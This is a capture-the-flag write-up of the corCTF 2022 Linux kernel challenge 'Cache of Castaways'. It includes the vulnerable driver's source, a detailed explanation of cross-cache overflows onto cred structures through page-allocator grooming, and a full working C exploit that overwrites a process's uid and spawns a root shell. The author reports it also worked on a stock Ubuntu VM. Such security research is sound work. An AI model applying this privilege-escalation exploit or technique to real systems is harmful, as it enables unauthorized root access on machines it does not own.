Last year in corCTF 2021, D3v17 and I wrote two kernel challenges demonstrating the power of msg_msg: Fire of Salvation and Wall of Perdition. These turned out to be a really powerful technique which have been repeatedly utilized in real world exploits.
For this year’s edition, we followed a similar trend and designed
challenges that require techniques seen before in real world exploits
(and not CTFs). I wrote Cache of Castaways, which requires a cross cache
attack against cred
structs in its isolated slabs. The
attack utilized a simplistic and leakless data-only approach applicable
in systems with low noise. D3v17 wrote CoRJail, which requires a docker escape and a novel approach of abusing poll_list
objects for an arbitrary free primitive through its slow path setup.
For my challenge, a standard CTF kernel setup was given along with the kernel compilation config. SMAP, SMEP, KPTI, KASLR, and many other standard kernel mitigations were on - I even disabled msg_msg for difficulty’s sake. The kernel version used was 5.18.3, booted with 1 CPU and 4 GBs of RAM. You can download the challenge with the included driver in the corCTF 2022 archive repo.
Here is the source of the CTF driver (I did not provide source during the competition as reversing this is quite simple):
MODULE_DESCRIPTION("a castaway cache, a secluded slab, a marooned memory"); MODULE_LICENSE("GPL"); MODULE_AUTHOR("FizzBuzz101"); typedef struct { int64_t idx; uint64_t size; char *buf; }user_req_t; int castaway_ctr = 0; typedef struct { char pad[OVERFLOW_SZ]; char buf[]; }castaway_t; struct castaway_cache { char buf[CHUNK_SIZE]; }; static DEFINE_MUTEX(castaway_lock); castaway_t **castaway_arr; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg); static long castaway_add(void); static long castaway_edit(int64_t idx, uint64_t size, char *buf); static struct miscdevice castaway_dev; static struct file_operations castaway_fops = {.unlocked_ioctl = castaway_ioctl}; static struct kmem_cache *castaway_cachep; static long castaway_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { user_req_t req; long ret = 0; if (cmd != ALLOC && copy_from_user(&req, (void *)arg, sizeof(req))) { return -1; } mutex_lock(&castaway_lock); switch (cmd) { case ALLOC: ret = castaway_add(); break; case EDIT: ret = castaway_edit(req.idx, req.size, req.buf); break; default: ret = -1; } mutex_unlock(&castaway_lock); return ret; } static long castaway_add(void) { int idx; if (castaway_ctr >= MAX) { goto failure_add; } idx = castaway_ctr++; castaway_arr[idx] = kmem_cache_zalloc(castaway_cachep, GFP_KERNEL_ACCOUNT); if (!castaway_arr[idx]) { goto failure_add; } return idx; failure_add: printk(KERN_INFO "castaway chunk allocation failed\n"); return -1; } static long castaway_edit(int64_t idx, uint64_t size, char *buf) { char temp[CHUNK_SIZE]; if (idx < 0 || idx >= MAX || !castaway_arr[idx]) { goto edit_fail; } if (size > CHUNK_SIZE || copy_from_user(temp, buf, size)) { goto edit_fail; } memcpy(castaway_arr[idx]->buf, temp, size); return size; edit_fail: printk(KERN_INFO "castaway chunk editing failed\n"); return -1; } static int init_castaway_driver(void) { castaway_dev.minor = MISC_DYNAMIC_MINOR; castaway_dev.name = DEVICE_NAME; castaway_dev.fops = &castaway_fops; castaway_dev.mode = 0644; mutex_init(&castaway_lock); if (misc_register(&castaway_dev)) { return -1; } castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); if (!castaway_arr) { return -1; } castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); if (!castaway_cachep) { return -1; } printk(KERN_INFO "All alone in an castaway cache... \n"); printk(KERN_INFO "There's no way a pwner can escape!\n"); return 0; } static void cleanup_castaway_driver(void) { int i; misc_deregister(&castaway_dev); mutex_destroy(&castaway_lock); for (i = 0; i < MAX; i++) { if (castaway_arr[i]) { kfree(castaway_arr[i]); } } kfree(castaway_arr); printk(KERN_INFO "Guess you remain a castaway\n"); } module_init(init_castaway_driver); module_exit(cleanup_castaway_driver);
There are only two ioctl commands. One for adding a chunk (all objects in the driver are of size 512 bytes), and one for editing a chunk, which has a clear 6 byte overflow. Only 400 allocations total are given. As per last year, none of the bugs in our kernel challenges are extremely difficult to find, as we wanted to focus on exploitation difficulty.
Under normal circumstances, a 6 byte overflow in a kernel object
should be quite exploitable. However, the given object is allocated in
an isolated slab cache, created with the flags SLAB_PANIC | SLAB_ACCOUNT
. Combined with the fact that I compiled with CONFIG_MEMCG_KMEM
support, allocations from this cache will be in its own separate slab away from other generic kmalloc-512 allocations, as duasynt documents. Else, the kernel can alias this cache with others sharing similar properties based on the find_mergeable
function, (actually this would still not be a problem in this challenge because I disabled CONFIG_SLAB_MERGE_DEFAULT
).
Not only is there freelist randomization and hardening, but the Linux kernel has also moved freelist pointers to the middle. The driver’s object also has neither pointers nor function pointers. How can one exploit this six byte overflow?
The answer is cross cache overflows. I found resources on this strategy quite scarce, and haven’t personally seen a CTF challenge that requires it. This technique is increasingly common in real world exploits as evidenced by CVE-2022-27666 or StarLabs kctf msg_msg exploit for CVE-2022-0185. Other articles that inspired this idea was grsecurity’s post on AUTOSLAB and this post on kmalloc internals. Funny enough, there was also another CVE discussing cross cache the day right before our CTF began: CVE-2022-29582.
Those articles talk about this technique in greater detail, so I advise you to read them beforehand.
To summarize on my end, kmalloc slab allocations are backed by the
underlying buddy allocator. When there are either no
slabs or available chunks in requested kmalloc cache, the allocator requests an
order-n page from the buddy allocator - it calls new_slab
, leading to allocate_slab
. This triggers a page request from the buddy allocator with alloc_page
in alloc_slab_page
.
The buddy allocator maintains an array of FIFO queues for each order-n page. An order-n page is just a chunk of size page multiplied by 2 to the power of n. When you free a chunk and it results in a completely empty slab, the slab allocator can return the underlying page(s) back to the buddy allocator.
The order for the underlying slab pages depends on a multitude of factors, including size of slab chunks, system specifications, and kernel builds - in practice, you can easily determine it by just looking at /proc/slabinfo (pagesperslab field). For this challenge, the chunks with isolated 512 byte objects require order-0 pages.
An important insight for cross cache overflows and page allocator level massage is the behavior of buddy allocators when a requested order’s queue is empty. In this case, the buddy allocator attempts to find a page from order n+1 and splits it in half, bringing these buddy pages into order n. If such a higher order buddy page does not exist, it just looks at the next order and so forth. When a page returns to the buddy allocator and its corresponding buddy page is also in the same queue, they are merged and move into the next order’s queue (and the same process can continue from there).
In many previous cross cache overflow exploits, the pattern is to
overflow from a slab without known abusable objects onto a slab with
abusable objects. It is also possible to abuse this cross cache principle for UAF bugs too. Most known exploits rely on target objects in pages
greater than order 0 due to the lesser amounts of noise there and
improved stability. However, this doesn’t make cross-cache overflows
onto order 0 pages impossible, especially if system noise is low. Order 0
would be a nice target because it would unlock even more abusable
objects in this system, like the famous 128 byte sized cred
struct. For those unfamiliar with the cred
object, it basically determines process privileges within the first few qwords.
I recall that one of my earliest memories in kernel exploitation was
learning that rooting a system by overflowing a cred struct is
impossible because of its slab isolation in the cred_jar
cache. Once I learned about cross-cache, I knew I just had to write a challenge to see if attacking cred structs are feasible.
The high level strategy of my exploit is the following: drain the cred_jar
so future allocations pull from the order 0 buddy allocator, drain many
higher order pages into order 0 sized pages, free some in a manner that
avoids buddy page merging, spray more cred
objects, free more held pages, and finally spray allocations of the vulnerable object to overflow onto at least one cred
object (the vulnerable object page must be allocated right above a cred
slab). The nice thing about this approach is its elegance - KASLR
leaks, arbitrary read/write, and ROP chains are not needed! It is a
simple, leakless, and data-only approach!
To trigger cred
object allocations, one just needs to fork
. Though a standard fork
does cause a lot of noise as other allocations do occur, this does not matter for the initial spray in my exploit.
As the driver has a limited amount of 512 byte allocations (only 400
total, so about 50 pages as there are 8 per slab) and has no freeing
option, a better page spraying primitive is required. The trick here
generally is to just look for functions that reference page allocator
functions, such as __get_free_pages
, alloc_page
, or alloc_pages
. D3v17 mentioned a really nice one to me based upon a page allocating primitive from CVE-2017-7308 documented in this p0 writeup. If you use setsockopt
to set packet version to TPACKET_V1
/TPACKET_V2
, and then use the same syscall to initialize a PACKET_TX_RING
(which creates a ring buffer used with PACKET_MMAP
for improved transmission through userspace mapped buffers for packets), then you will hit this line in packet_setsockopt
. Note that the p0 writeup used PACKET_RX_RING
, but PACKET_TX_RING
gives us the same results for the purposes of page allocator control.
case PACKET_RX_RING: case PACKET_TX_RING: { union tpacket_req_u req_u; int len; lock_sock(sk); switch (po->tp_version) { case TPACKET_V1: case TPACKET_V2: len = sizeof(req_u.req); break; case TPACKET_V3: default: len = sizeof(req_u.req3); break; } if (optlen < len) { ret = -EINVAL; } else { if (copy_from_sockptr(&req_u.req, optval, len)) ret = -EFAULT; else ret = packet_set_ring(sk, &req_u, 0, optname == PACKET_TX_RING); } release_sock(sk); return ret; }
This case calls packet_set_ring
using the provided tpacket_req_u
union, which then calls alloc_pg_vec
. The arguments here utilize the tpacket_req
struct pulled from the union, as well as the order based on the struct’s tp_block_size
. In this latter function, it calls alloc_one_page_vec
tp_block_nr
of times, which leads to a __get_free_pages
call.
}
What the above primitive gives us is the ability to drain tp_block_nr
number of order n (where n is determined by tp_block_size
)
pages and to free tp_block_nr amount of pages by closing the
socket fd. The only issue is that default low privileged users can’t
utilize these functions in the root namespace, but we can usually make
our own unprivileged namespaces in many Linux systems. There are
definitely alternative methods to drain pages (and most likely ones
without needing namespaces). Another approach to page draining would be to repeatedly spray object allocations (like msg_msg which I
disabled), though it might be less reliable if it is in a shared slab.
Another important point to address now for the exploit is on the noise fork
(or clone
with equivalent flags) causes. Everytime you fork
, many allocations (from both kmalloc and buddy allocator) occurs.
The core function for process creation is kernel_clone
. Keep in mind that a traditional fork has no flags set in kernel_clone_args
. The following then happens:
1. kernel_clone
calls copy_process
2. copy_process
calls dup_task_struct
. This allocates a task_struct from its own cache (relies on order 2 pages in target system). Then, it calls alloc_thread_stack_node
, which will use __vmalloc_node_range
to allocate a 16kb vrtually contiguous region for kernel thread stack
if no cached stacks are available. This usually will allocate away 4
order 0 pages.
3. The above vmalloc call allocates a kmalloc-64 chunk to help
setup the vmalloc virtual mappings. Following this, the kernel allocates two vmap_area
chunks from vmap_area_cachep
. For this system and kernel, there were 2, with the first from alloc_vmap_area
. I am not completely sure where the second vmap_area
chunk allocation was triggered from - I suspect it came from preload_this_cpu_lock
. Debugging confirms this hypothesis on this setup and shows that it does not hit the subsequent free path.
4. Then copy_process
calls copy_creds
, which triggers a cred object (our desired target) allocation from prepare_creds
. This occurs as long as the CLONE_THREAD
flag isn’t set.
int copy_creds(struct task_struct *p, unsigned long clone_flags) { struct cred *new; int ret; p->cached_requested_key = NULL; if ( !p->cred->thread_keyring && clone_flags & CLONE_THREAD ) { p->real_cred = get_cred(p->cred); get_cred(p->cred); alter_cred_subscribers(p->cred, 2); kdebug("share_creds(%p{%d,%d})", p->cred, atomic_read(&p->cred->usage), read_cred_subscribers(p->cred)); inc_rlimit_ucounts(task_ucounts(p), UCOUNT_RLIMIT_NPROC, 1); return 0; } new = prepare_creds(); if (!new) return -ENOMEM;
5. Starting from this section of copy_process
,
a series of copy_x functions (where x is some process attributes)
begins. All of them will trigger an allocation, unless its respective CLONE
flag is set. In a normal fork, one would expect a new chunk to be allocated from files_cache
, fs_cache
, sighand_cache
, and signal_cache
. The source of the largest noise comes from the setup of mm_struct
, which triggers as long as CLONE_VM
isn’t set. This in turn triggers a lot of memory allocation activity, in caches like vm_area_struct
, anon_vma_chain
, and anon_vma
. All of these allocations here are backed by order 0 pages on this system.
retval = copy_semundo(clone_flags, p);
if (retval)
goto bad_fork_cleanup_security;
retval = copy_files(clone_flags, p);
if (retval)
goto bad_fork_cleanup_semundo;
retval = copy_fs(clone_flags, p);
if (retval)
goto bad_fork_cleanup_files;
retval = copy_sighand(clone_flags, p);
if (retval)
goto bad_fork_cleanup_fs;
retval = copy_signal(clone_flags, p);
if (retval)
goto bad_fork_cleanup_sighand;
retval = copy_mm(clone_flags, p);
if (retval)
goto bad_fork_cleanup_signal;
retval = copy_namespaces(clone_flags, p);
if (retval)
goto bad_fork_cleanup_mm;
retval = copy_io(clone_flags, p);
if (retval)
goto bad_fork_cleanup_namespaces;
retval = copy_thread(clone_flags, args->stack, args->stack_size, p, args->tls);
if (retval)
goto bad_fork_cleanup_io;
6. Lastly, the kernel allocates a pid chunk - its slab requires an order 0 page.
There are definitely more details and steps I missed, but the above should suffice for the context of this writeup. The utilized cache properties might also be different depending on slab mergeability and required page sizes for other systems.
Ignoring page allocations from calls like vmalloc and just looking at slab allocations, a single fork would trigger this pattern in this system:
task_struct kmalloc-64 vmap_area vmap_area cred_jar files_cache fs_cache sighand_cache signal_cache mm_struct vm_area_struct vm_area_struct vm_area_struct vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct anon_vma_chain anon_vma anon_vma_chain vm_area_struct vm_area_struct pid
Based on our source analysis earlier on, and the clone manpage, I managed to drastically reduce this noise with the following flags: CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND
. Now, cloning only produces these series of slab allocations:
task_struct kmalloc-64 vmap_area vmap_area cred_jar signal_cache pid
Note that there will still be the 4 order 0 page allocations from vmalloc as well. Regardless, this noise level is much more acceptable. The only issue now is that our child processes cannot really write to any process memory as it’s sharing the same virtual memory, so we have to use shellcode dependent on only registers to check for successful privilege escalation.
Knowing all of this, we can formulate an exploit now.
Using the initial setsockopt page spray technique, I requested many order 0 pages and freed one out of every two of them. I will now have a lot of order 0 pages that will not be coalesced into order 1 pages. I had the initial exploit fork into a separate privileged user namespace in order to utilize these page level spraying primitives.
Then, I called clone many times with the above flags to trigger the creation of cred
objects, freed remaining order 0 pages, and sprayed allocations of the
vulnerable object to create a scenario where one page of vulnerable
objects are on of a cred
objects page. Note that this isn’t
structured in a way that follows the allocation behavior seen in fork exactly -
we would be allocating adjacent to all the above objects reliant on
order 0 (pages for vmalloc, pid slab, vmap_area slab, etc.) However, the
differences should eventually align properly against a cred slab (and
it turned out that it did!) to create the adjacency scenario. I would
assume the overflow has also hit other chunks, which might result in
horrible crashes, but I rarely experienced this - I am not exactly sure
why this is the case.
I overflowed all of the vulnerable objects with the following payload: 4 bytes that represent 1 and 2 bytes that represents 0. This first 4 bytes is to keep the usage field sane for kernel checks, while the second 2 bytes will zero out the uid field (as Linux uids don’t go over 65535). After this overflow spray, I pipe a message to all the forks - they in turn will check their uid and drop a shell if it is root.
Below is my final exploit, which effectively has a 100% success rate.
typedef struct { int64_t idx; uint64_t size; char *buf; }user_req_t; struct tpacket_req { unsigned int tp_block_size; unsigned int tp_block_nr; unsigned int tp_frame_size; unsigned int tp_frame_nr; }; enum tpacket_versions { TPACKET_V1, TPACKET_V2, TPACKET_V3, }; typedef struct { bool in_use; int idx[ISO_SLAB_LIMIT]; }full_page; enum spray_cmd { ALLOC_PAGE, FREE_PAGE, EXIT_SPRAY, }; typedef struct { enum spray_cmd cmd; int32_t idx; }ipc_req_t; full_page isolation_pages[FINAL_PAGE_SPRAY] = {0}; int rootfd[2]; int sprayfd_child[2]; int sprayfd_parent[2]; int socketfds[INITIAL_PAGE_SPRAY]; int64_t ioctl(int fd, unsigned long request, unsigned long param) { long result = syscall(16, fd, request, param); if (result < 0) perror("ioctl on driver"); return result; } int64_t alloc(int fd) { return ioctl(fd, ALLOC, 0); } int64_t delete(int fd, int64_t idx) { user_req_t req = {0}; req.idx = idx; return ioctl(fd, DELETE, (unsigned long)&req); } int64_t edit(int fd, int64_t idx, uint64_t size, char *buf) { user_req_t req = {.idx = idx, .size = size, .buf = buf}; return ioctl(fd, EDIT, (unsigned long)&req); } void debug() { puts("pause"); getchar(); return; } void unshare_setup(uid_t uid, gid_t gid) { int temp; char edit[0x100]; unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); temp = open("/proc/self/setgroups", O_WRONLY); write(temp, "deny", strlen("deny")); close(temp); temp = open("/proc/self/uid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", uid); write(temp, edit, strlen(edit)); close(temp); temp = open("/proc/self/gid_map", O_WRONLY); snprintf(edit, sizeof(edit), "0 %d 1", gid); write(temp, edit, strlen(edit)); close(temp); return; } // https://man7.org/linux/man-pages/man2/clone.2.html __attribute__((naked)) pid_t __clone(uint64_t flags, void *dest) { asm("mov r15, rsi;" "xor rsi, rsi;" "xor rdx, rdx;" "xor r10, r10;" "xor r9, r9;" "mov rax, 56;" "syscall;" "cmp rax, 0;" "jl bad_end;" "jg good_end;" "jmp r15;" "bad_end:" "neg rax;" "ret;" "good_end:" "ret;"); } struct timespec timer = {.tv_sec = 1000000000, .tv_nsec = 0}; char throwaway; char root[] = "root\n"; char binsh[] = "/bin/sh\x00"; char *args[] = {"/bin/sh", NULL}; __attribute__((naked)) void check_and_wait() { asm( "lea rax, [rootfd];" "mov edi, dword ptr [rax];" "lea rsi, [throwaway];" "mov rdx, 1;" "xor rax, rax;" "syscall;" "mov rax, 102;" "syscall;" "cmp rax, 0;" "jne finish;" "mov rdi, 1;" "lea rsi, [root];" "mov rdx, 5;" "mov rax, 1;" "syscall;" "lea rdi, [binsh];" "lea rsi, [args];" "xor rdx, rdx;" "mov rax, 59;" "syscall;" "finish:" "lea rdi, [timer];" "xor rsi, rsi;" "mov rax, 35;" "syscall;" "ret;"); } int just_wait() { sleep(1000000000); } // https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html int alloc_pages_via_sock(uint32_t size, uint32_t n) { struct tpacket_req req; int32_t socketfd, version; socketfd = socket(AF_PACKET, SOCK_RAW, PF_PACKET); if (socketfd < 0) { perror("bad socket"); exit(-1); } version = TPACKET_V1; if (setsockopt(socketfd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0) { perror("setsockopt PACKET_VERSION failed"); exit(-1); } assert(size % 4096 == 0); memset(&req, 0, sizeof(req)); req.tp_block_size = size; req.tp_block_nr = n; req.tp_frame_size = 4096; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; if (setsockopt(socketfd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) { perror("setsockopt PACKET_TX_RING failed"); exit(-1); } return socketfd; } void spray_comm_handler() { ipc_req_t req; int32_t result; do { read(sprayfd_child[0], &req, sizeof(req)); assert(req.idx < INITIAL_PAGE_SPRAY); if (req.cmd == ALLOC_PAGE) { socketfds[req.idx] = alloc_pages_via_sock(4096, 1); } else if (req.cmd == FREE_PAGE) { close(socketfds[req.idx]); } result = req.idx; write(sprayfd_parent[1], &result, sizeof(result)); } while(req.cmd != EXIT_SPRAY); } void send_spray_cmd(enum spray_cmd cmd, int idx) { ipc_req_t req; int32_t result; req.cmd = cmd; req.idx = idx; write(sprayfd_child[1], &req, sizeof(req)); read(sprayfd_parent[0], &result, sizeof(result)); assert(result == idx); } void alloc_vuln_page(int fd, full_page *arr, int page_idx) { assert(!arr[page_idx].in_use); for (int i = 0; i < ISO_SLAB_LIMIT; i++) { long result = alloc(fd); if (result < 0) { perror("allocation error"); exit(-1); } arr[page_idx].idx[i] = result; } arr[page_idx].in_use = true; } void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz) { assert(arr[page_idx].in_use); for (int i = 0; i < ISO_SLAB_LIMIT; i++) { long result = edit(fd, arr[page_idx].idx[i], sz, buf); if (result < 0) { perror("free error"); exit(-1); } } } int main(int argc, char **argv) { int fd = open("/dev/castaway", O_RDONLY); if (fd < 0) { perror("driver can't be opened"); exit(0); } // for communicating with spraying in separate namespace via TX_RINGs pipe(sprayfd_child); pipe(sprayfd_parent); puts("setting up spray manager in separate namespace"); if (!fork()) { unshare_setup(getuid(), getgid()); spray_comm_handler(); } // for communicating with the fork later pipe(rootfd); char evil[CHUNK_SIZE]; memset(evil, 0, sizeof(evil)); // initial drain puts("draining cred_jar"); for (int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++) { pid_t result = fork(); if (!result) { just_wait(); } if (result < 0) { puts("fork limit"); exit(-1); } } // buddy allocator massage puts("massaging order 0 buddy allocations"); for (int i = 0; i < INITIAL_PAGE_SPRAY; i++) { send_spray_cmd(ALLOC_PAGE, i); } for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2) { send_spray_cmd(FREE_PAGE, i); } for (int i = 0; i < FORK_SPRAY; i++) { pid_t result = __clone(CLONE_FLAGS, &check_and_wait); if (result < 0) { perror("clone error"); exit(-1); } } for (int i = 0; i < INITIAL_PAGE_SPRAY; i += 2) { send_spray_cmd(FREE_PAGE, i); } *(uint32_t*)&evil[CHUNK_SIZE-0x6] = 1; // cross cache overflow puts("spraying cross cache overflow"); for (int i = 0; i < FINAL_PAGE_SPRAY; i++) { alloc_vuln_page(fd, isolation_pages, i); edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE); } puts("notifying forks that spray is completed"); write(rootfd[1], evil, FORK_SPRAY); sleep(100000); exit(0); }
Congratulations to kylebot and pql
for taking first and second blood respectively during the competition!
Kylebot did not target cred struct - he cross cached onto seq_file
objects for arbitrary read to leak driver addresses and for arbitrary free against the castaway_arr
to build a UAF and arb write primitive. pql did target cred struct with
cross cache overflow, but in a different and more stable way. The exploit relied on setuid
, which triggers prepare_creds
and allocates cred objects to prepopulate cred_jar
slabs. This way, the exploit can trigger allocations of such pages
without much noise and then fork to retake them. I personally never expected that function to allocate these objects as I thought it would just run permission checks and mutate in place, but seems like the lesson here is to always check source. Overall, there did seem to be a
notion beforehand among solvers (and other kernel pwners I talked with)
that targeting cred structs in a cross cache overflow scenario will be
quite difficult, if not nearly impossible, so it is quite nice to see it
come to fruition.
After the CTF, I was curious to see if this technique is applicable on a real Linux system that isn’t just a minimalistic busybox setup. To test, I setup a single core default Ubuntu HWE 20.04 server VM with 4 gbs of RAM and KVM enabled. Surprisingly, upon testing the exploit on the system with the loaded drivers, only two changes were required.
For one, I had to increase the FINAL_PAGE_SPRAY macro to 50, which
makes sense as this setup is an actual Linux distro with more moving
parts. Another change I had to make was to adjust for Ubuntu’s kernel CONFIG_SCHED_STACK_END_CHECK
option. As many of my overflows wrote into kernel stacks, the payload will cause this stack end check to fail. The check is just this macro:
#define task_stack_end_corrupted(task) \ (*(end_of_stack(task)) != STACK_END_MAGIC)
STACK_END_MAGIC
is the 4 byte value 0x57AC6E9D. Our payload
will just include this value instead of 1, as this is still a valid
value for the usage field.
With those changes, we can achieve a working exploit agaisnt the CTF challenge driver with this technique on a real distro. The success rate is around 50%, but consider that I barely adjusted anything from the original spray I used - a more fine grained adjustment would have led to better success.
As for a multicore setup, the isolated slab of 512 byte chunks was backed by a order 1 page. This would require re-designing the spray (and setting core affinity due to per cpu slub lists), but I hypothesize that the technical concept should still hold.
Anyways, I think this is a really cool kernel exploit technique - leakless, data-only, all the pwn buzzwords! A huge thanks must also go to D3v17 and Markak for providing feedback on this writeup beforehand. Feel free to inform me if there are any confusing explanations or incorrect information in this writeup, and do let me know if you manage to use this technique in a real world exploit!
Addendum: I originally wrote most of this immediately after corCTF 2022, but decided to post after Defcon 2022 due to time constraints as I was attending the CTF and the convention (shoutout to the All Roads Lead to GKE's Host presentation from StarLabs that talked about cross cache in great depth too!). During Defcon, 0xTen mentioned to me Markak's presentation on DirtyCred at Blackhat a week earlier, which demonstrated another novel approach to attack cred structs in scenarios of UAF/double-free/arbitrary-free via cross cache and has been successfully tested on older CVEs. I guess this cross cache technique has truly revived cred objects as a viable target for exploitation in the most common classes of memory safety bugs 😎